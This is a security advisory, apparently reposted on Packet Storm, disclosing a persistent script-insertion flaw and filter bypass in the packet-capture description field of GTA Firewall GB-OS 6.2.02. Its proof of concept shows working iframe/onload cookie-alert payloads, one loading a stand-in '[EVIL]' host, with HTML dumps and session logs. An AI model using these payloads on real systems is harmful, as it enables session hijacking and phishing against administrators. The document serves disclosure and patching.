what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

GTA Firewall GB-OS 6.2.02 Script Insertion

GTA Firewall GB-OS 6.2.02 Script Insertion
Posted Feb 25, 2016
Authored by Benjamin Kunz Mejri, Vulnerability Laboratory | Site vulnerability-lab.com

GTA Firewall GB-OS version 6.2.02 suffers from a local malicious script insertion vulnerability.

tags | exploit, local
SHA-256 | 4cd215368c415a6cbaf6fb3acfa8229e1e2cc4e04a4c7a02b548cec34d49bd1c

GTA Firewall GB-OS 6.2.02 Script Insertion

Change Mirror Download
Document Title:
===============
GTA Firewall GB-OS v6.2.02 - Filter Bypass & Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1713


Release Date:
=============
2016-02-24


Vulnerability Laboratory ID (VL-ID):
====================================
1713


Common Vulnerability Scoring System:
====================================
3


Product & Service Introduction:
===============================
GB-OS 6.2 presents numerous enhancements and new features for GTA firewall UTM appliances. GB-OS updates include new country
blocking configuration options, additional report types and graphs, threat management and high availability enhancements,
certificate management additions, IPv6 updates, and abundant web interface upgrades. GB-OS 6.2 also provides 64-bit support
for GB-2100 and GB-2500. GB-Ware includes both 64-bit and 32-bit support.

Certificate management updates include the addition of pkcs#7 format, CRLs and the ability to revoke certificates. High Availability
features improved slave and group updating for easier failover management utilizing multiple firewalls, and an increased VRID range.
Threat management updates protect your network and resources with up-to-the minute technology. The power of GTA`s Mail Proxy is
boosted with support for EHLO and ESIZE commands and the addition of a DNS white list. The Web Filtering subscription option
includes new refined content categories, providing more granular web access control for employees.

Web interface improvements include menu navigation modifications, country flags, updated monitoring and activity pages and updated
configuration wizards. These modifications and new elements aide administrators in configuring and managing GB-OS powered firewalls.
Configuration verification messages and log messages have also been updated for improved firewall administration.

(Copy of the Homepage: http://www.gta.com/firewalls/ss/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation web vulnerability in the official GTA Web Firewall appliance - GB OS v6.2.02.


Vulnerability Disclosure Timeline:
==================================
2016-02-04: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-02-05: Vendor Notification (GTA Security Team)
2016-02-10: Vendor Response/Feedback (GTA Security Team)
2016-02-11: Vendor Fix/Patch #1 (GTA Developer Team)
2016-02-20: Security Acknowledgements (GTA Security Team)
2016-02-24: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Global Technology Assiciates Inc
Product: GTA Web Firewall - Web-Application (Appliance) GB-2500, GB-2100, GB-850, GB-300 & GB-Ware


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official GTA Web Firewall appliance - GB OS v6.2.02.
The vulnerability allows a local attackers to inject own malicious script codes to the application-side of the affected modules context.

The security vulnerability is located in the `Edit Packet Capture Filter` function of the `Monitor - Packet Capture - Monitor - Tools - Packet Capture` module.
Remote attackers are able to inject script codes to the description input field by adding a new packet capture filter in the web firewall interface. The injection
point is the `Edit Packet Capture Filter - Description Input Field` and the execution point is the `Packet Capture` item listing. The attack vector is persistent
(application-side) and the request method to inject is POST.

The web firewall interface has an own validation procedure to filter bad inputs. The input validation of the description can be bypassed by injection of a splitted
char injection. The attacker can inject two payloads and the first is filtered, the second bypasses the validation.

The security risk of the application-side validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0.
Exploitation of the persistent input validation web vulnerability requires a privileged appliance web-application user account and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and
persistent manipulation of affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable Service(s):
[+] GB OS v6.2.02

Vulnerable Module(s):
[+] Packet Capture - [Monitor - Tools - Packet Capture]

Vulnerable Input(s):
[+] Edit Packet Capture Filter - [Description]

Vulnerable Parameter(s):
[+] description - listtextplain

Affected Module(s):
[+] Packet Capture Item Listing


Proof of Concept (PoC):
=======================
The application-side validation vulnerability and filter bypass can be exploited by local attackers with privileged web-application user account and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.


PoC: Packet Capture - [Monitor -> Tools -> Packet Capture]
<td id="idRowDesc_3" class="listtextplain">"><iframe src="http://[EVIL]" onload="alert(document.cookie)" <="" "=""><iframe src=http://[EVIL] onload=alert(document.cookie) <</iframe></td>
...
<tbody><tr class="listth">
<th id="idColAddDel_0" class="listth"><a id="btnAdd_0" href="javascript:addRow(0);" title="New"><img src="/images/list/add_16.gif" height="12" width="12"></a></th>
<th class="listth" style="">Index</th>
<th class="listth" style="">Edit</th>
<th class="listth" style="">Interface</th>
<th class="listth" style="">Capture File</th>
<th class="listth" style="">Packets Captured</th>
<th class="listth" style="">Description</th></tr>
<tr class="listtextplain"><td id="idColAddDel_1" class="listtextplain"><a title="New" href="javascript:addRow(1);" id="btnAdd_1"><img src="/images/list/add_16.gif" height="12" width="12"></a><img src="/images/spacer.gif" width="8"><a title="Delete" href="javascript:delRow(1);" id="btnDel_1"><img src="/images/list/del_16.gif" height="12" width="12"></a></td><td class="listtextplain">1</td><td class="listtextplain"><input name="desc_1" id="desc_1" type="hidden"><input value="EXTERNAL" name="iface_1" id="iface_1" type="hidden"><input value="ANY_IP" name="dst_1_obj" id="dst_1_obj" type="hidden"><input name="dst_1_ip" id="dst_1_ip" type="hidden"><input value="ANY_SERVICE" name="service_1_obj" id="service_1_obj" type="hidden"><input name="service_1_proto" id="service_1_proto" type="hidden"><input name="service_1_ports" id="service_1_ports" type="hidden"><input value="100" name="maxPkts_1" id="maxPkts_1" type="hidden"><input value="1024" name="maxFileSize_1" id="maxFileSize_1" type="hidden"><input value="256" name="pktSize_1" id="pktSize_1" type="hidden"><a title="Edit" href="javascript:editRow(1);" id="btnEdit_1"><img src="/images/btns/edit1_16.gif" height="12" width="12"></a></td><td id="idRowIface_1" class="listtextplain">EXTERNAL</td><td class="listtextplain"><a style="display: none;" title="Save" href="javascript:downloadRow(1);" id="btnDL_1"><img src="/images/list/save_16.gif" height="12" width="12"></a></td><td id="idRowPktCap_1" class="listtextplain"><div id="idRowProgress_1" style="background-image: url("/images/info/prog-gray.gif"); height: 18px; width: 300px; float: left;"><div style="background-image: url("/images/info/prog-left.gif"); height: 18px; width: 2px; float: left;"></div><div style="background-image: url("/images/info/prog-blue.gif"); height: 18px; width: 148px; float: left;"></div><div style="background-image: url("/images/info/prog-right.gif"); height: 18px; width: 2px; float: right;"></div></div></td><td id="idRowDesc_1" class="listtextplain"></td></tr><tr class="listtextplain"><td id="idColAddDel_2" class="listtextplain"><a title="New" href="javascript:addRow(2);" id="btnAdd_2"><img src="/images/list/add_16.gif" height="12" width="12"></a><img src="/images/spacer.gif" width="8"><a title="Delete" href="javascript:delRow(2);" id="btnDel_2"><img src="/images/list/del_16.gif" height="12" width="12"></a></td><td class="listtextplain">2</td><td class="listtextplain"><input value="asdasd" name="desc_2" id="desc_2" type="hidden"><input value="EXTERNAL" name="iface_2" id="iface_2" type="hidden"><input value="ANY_IP" name="dst_2_obj" id="dst_2_obj" type="hidden"><input value="" name="dst_2_ip" id="dst_2_ip" type="hidden"><input value="ANY_SERVICE" name="service_2_obj" id="service_2_obj" type="hidden"><input value="1" name="service_2_proto" id="service_2_proto" type="hidden"><input value="" name="service_2_ports" id="service_2_ports" type="hidden"><input value="100"><iframe src=a onload=alert("PENTEST") <" name="maxPkts_2" id="maxPkts_2" type="hidden"><input value="1024" name="maxFileSize_2" id="maxFileSize_2" type="hidden"><input value="256"><iframe src=a onload=alert("PENTEST") <" name="pktSize_2" id="pktSize_2" type="hidden"><a title="Edit" href="javascript:editRow(2);" id="btnEdit_2"><img src="/images/btns/edit1_16.gif" height="12" width="12"></a></td><td id="idRowIface_2" class="listtextplain">EXTERNAL</td><td class="listtextplain"><a style="display: none;" title="Save" href="javascript:downloadRow(2);" id="btnDL_2"><img src="/images/list/save_16.gif" height="12" width="12"></a></td><td id="idRowPktCap_2" class="listtextplain"><div id="idRowProgress_2" style="background-image: url("/images/info/prog-gray.gif"); height: 18px; width: 300px; float: left;"><div style="background-image: url("/images/info/prog-left.gif"); height: 18px; width: 2px; float: left;"></div><div style="background-image: url("/images/info/prog-blue.gif"); height: 18px; width: 148px; float: left;"></div><div style="background-image: url("/images/info/prog-right.gif"); height: 18px; width: 2px; float: right;"></div></div></td><td id="idRowDesc_2" class="listtextplain">asdasd</td></tr><tr class="listtextplain"><td id="idColAddDel_3" class="listtextplain"><a title="New" href="javascript:addRow(3);" id="btnAdd_3"><img src="/images/list/add_16.gif" height="12" width="12"></a><img src="/images/spacer.gif" width="8"><a title="Delete" href="javascript:delRow(3);" id="btnDel_3"><img src="/images/list/del_16.gif" height="12" width="12"></a></td><td class="listtextplain">3</td><td class="listtextplain"><input value=""><iframe src=a onload=alert(document.cookie) < "><iframe src=a onload=alert(document.cookie) <" name="desc_3" id="desc_3" type="hidden"><input value="EXTERNAL" name="iface_3" id="iface_3" type="hidden"><input value="ANY_IP" name="dst_3_obj" id="dst_3_obj" type="hidden"><input value="" name="dst_3_ip" id="dst_3_ip" type="hidden"><input value="ANY_SERVICE" name="service_3_obj" id="service_3_obj" type="hidden"><input value="1" name="service_3_proto" id="service_3_proto" type="hidden"><input value="" name="service_3_ports" id="service_3_ports" type="hidden"><input value="100" name="maxPkts_3" id="maxPkts_3" type="hidden"><input value="1024" name="maxFileSize_3" id="maxFileSize_3" type="hidden"><input value="256" name="pktSize_3" id="pktSize_3" type="hidden"><a title="Edit" href="javascript:editRow(3);" id="btnEdit_3"><img src="/images/btns/edit1_16.gif" height="12" width="12"></a></td><td id="idRowIface_3" class="listtextplain">EXTERNAL</td><td class="listtextplain"><a style="display: none;" title="Save" href="javascript:downloadRow(3);" id="btnDL_3"><img src="/images/list/save_16.gif" height="12" width="12"></a></td><td id="idRowPktCap_3" class="listtextplain"><div id="idRowProgress_3" style="background-image: url("/images/info/prog-gray.gif"); height: 18px; width: 300px; float: left;"><div style="background-image: url("/images/info/prog-left.gif"); height: 18px; width: 2px; float: left;"></div><div style="background-image: url("/images/info/prog-blue.gif"); height: 18px; width: 148px; float: left;"></div><div style="background-image: url("/images/info/prog-right.gif"); height: 18px; width: 2px; float: right;"></div></div></td><td id="idRowDesc_3" class="listtextplain">"><iframe src="a" onload="alert(document.cookie)" <="" "=""><iframe src=a onload=alert(document.cookie) <</iframe></td></tr></tbody>


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:7319/alive
Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[localhost:7319]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:7319/menu/navmenu6201_en_6.2.01_sw_i_Live.html]
Cookie[GBPREFS=expert=false; GBMODE=; GBPRODUCT=; GBNOWIZARD=true; hintsHidden=; GBMENUFRAME=idSslVpn|idMonitor|; GBMENU+=186|183|176|; GBAUTH=; GBFB_AUTH_KEY=90428582497884388874313717111004; dnsopt=; adv179_1=%23%3Fadv_view%3Dtrue]
Connection[keep-alive]
Content-Length[0]
Response Header:
Server[unknown]
Content-Type[text/html; charset=utf-8]
Connection[Keep-Alive]
Date[2016-02-05 04:29:56 EST (-0500)]
Expires[2016-02-05 04:29:56 EST (-0500)]
Cache-Control[no-cache, no-store, must-revalidate]
Set-Cookie[GBPREFS=expert=false; HttpOnly; path=/;
GBNOWIZARD=true; path=/;
GBMODE=; path=/;
GBPRODUCT=; path=/;
GBAUTH=; path=/;]
Transfer-Encoding[chunked]
-
Status: 200[OK]
GET http://localhost:7319/monitor/a[PERSISTENT INJECTED SCRIPT CODE EXECUTION!]
Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:7319]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:7319/monitor/pktCapture6201.html]
Cookie[GBPREFS=expert=false; GBMODE=; GBPRODUCT=; GBNOWIZARD=true; hintsHidden=; GBMENUFRAME=idSslVpn|idMonitor|; GBMENU+=186|183|176|; GBAUTH=; GBFB_AUTH_KEY=90428582497884388874313717111004; dnsopt=; adv179_1=%23%3Fadv_view%3Dtrue]
Connection[keep-alive]
Response Header:
Server[unknown]
Connection[close]
Date[2016-02-05 04:30:20 EST (-0500)]
-
Status: 200[OK]
GET http://localhost:7319/monitor/a[PERSISTENT INJECTED SCRIPT CODE EXECUTION!]
Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:7319]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:7319/monitor/pktCapture6201.html]
Cookie[GBPREFS=expert=false; GBMODE=; GBPRODUCT=; GBNOWIZARD=true; hintsHidden=; GBMENUFRAME=idSslVpn|idMonitor|; GBMENU+=186|183|176|; GBAUTH=; GBFB_AUTH_KEY=90428582497884388874313717111004; dnsopt=; adv179_1=%23%3Fadv_view%3Dtrue]
Connection[keep-alive]
Response Header:
Server[unknown]
Connection[close]
Date[2016-02-05 04:30:39 EST (-0500)]
-
ALERT: GBMODE=; GBPRODUCT=; GBNOWIZARD=true; hintsHidden=; GBMENUFRAME=idSslVpn|idMonitor|; GBMENU+=186|183|176|; GBAUTH=; GBFB_AUTH_KEY=90428582497884388874313717111004; dnsopt=; adv179_1=%23%3Fadv_view%3Dtrue


Reference(s):
http://localhost:7319/menu/
http://localhost:7319/alive/
http://localhost:7319/monitor/


Solution - Fix & Patch:
=======================
The security vulnerability in the web firewall can be patched by a secure encode and parse of the vulnerable description input field context with
the `description - listtextplain` parameter. Restrict the input, disallow special chars and escape the context to prevent persistent script code
injection attacks. Encode also the description output in the listing to patch the execution point of the bug.

Information: The GTA developer team patched the vulnerability in version 6.2.03 with cooperation of the internal security team.


Security Risk:
==============
The security risk of the application-side input validation web vulnerability and filter bypass issue in the web firewall are estimated as medium. (CVSS 3.0)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close